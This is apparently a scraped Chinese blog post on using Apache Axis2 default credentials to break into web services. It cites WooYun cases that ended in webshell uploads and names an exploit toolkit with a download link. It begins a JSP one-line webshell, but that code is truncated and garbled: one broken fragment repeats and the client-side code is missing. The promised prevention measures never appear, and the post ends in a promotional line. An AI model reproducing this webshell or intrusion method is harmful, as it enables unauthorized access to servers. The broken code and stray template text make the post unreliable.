利用Axis2默认凭据漏洞入侵Web服务的安全风险分析与防范措施分享

近期，在乌云上关注了几则利用Axis2默认口令进行渗透%ignore_a_1%的案例，大家的渗透思路基本一致，利用的技术工具也大致相同，我在总结这几则案例的基础之上进行了技术思路的拓展。

乌云Axis2默认口令安全弱点利用案例：

航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全目测已被其他人渗透过)

乐信通某服务器axis2服务存在弱口令可上传webshell（root权限）

中国科学院网Web-services(axis2)系统任意代码执行

工具准备:

Axis2利用工具包： cat.arr

cat.arr工具说明与下载参见大牛“PHP to Java”的博客http://javaweb.org/?p=1548

JSP一句话木马

服务器端一句话木马代码：

<%if(request.getparameter(“f”)!=null)(new>

<%if(request.getparameter(“f”)!=null)(new>

客户端提交代码：

—-想了解更多的网站安全相关处理怎么解决关注<编程笔记>